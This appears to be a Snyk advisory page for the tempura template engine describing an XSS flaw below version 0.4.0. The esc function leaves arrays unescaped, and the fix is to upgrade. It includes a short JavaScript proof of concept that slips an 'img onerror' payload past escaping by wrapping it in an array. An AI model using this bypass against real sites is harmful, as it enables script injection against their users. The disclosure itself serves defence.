tempura@0.1.0-next.2 vulnerabilities

A light, crispy, and delicious template engine

  • latest version

    0.4.1

  • latest non vulnerable version

  • first published

    12 years ago

  • latest version published

    5 months ago

  • licenses detected

  • Direct Vulnerabilities

    Known vulnerabilities in the tempura package. This does not include vulnerabilities belonging to this package’s dependencies.

    How to fix?

    Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

    Fix for free
    VulnerabilityVulnerable Version
    • M
    Cross-site Scripting (XSS)

    tempura is an A light, crispy, and delicious template engine.

    Affected versions of this package are vulnerable to Cross-site Scripting (XSS). If the input to the esc function is of type object (i.e an array) it is returned without being escaped/sanitized, leading to a potential Cross-Site Scripting vulnerability.

    PoC

    const tempura = require("tempura");
    
    let template = `
        {{#expect name}}
        <p> Hello, {{name}} </p>
    `
    
    let render = tempura.compile(template)
    
    let r1 = render({name: "<img src=x onerror='alert(1)' />"})
    console.log(r1) // <p> Hello, &ltimg src=x onerror='alert(1)' /> </p>
    
    let r2 = render({name: ["<img src=x onerror='alert(1)' />"]})
    console.log(r2) // <p> Hello, <img src=x onerror='alert(1)' /> </p>
    

    How to fix Cross-site Scripting (XSS)?

    Upgrade tempura to version 0.4.0 or higher.

    <0.4.0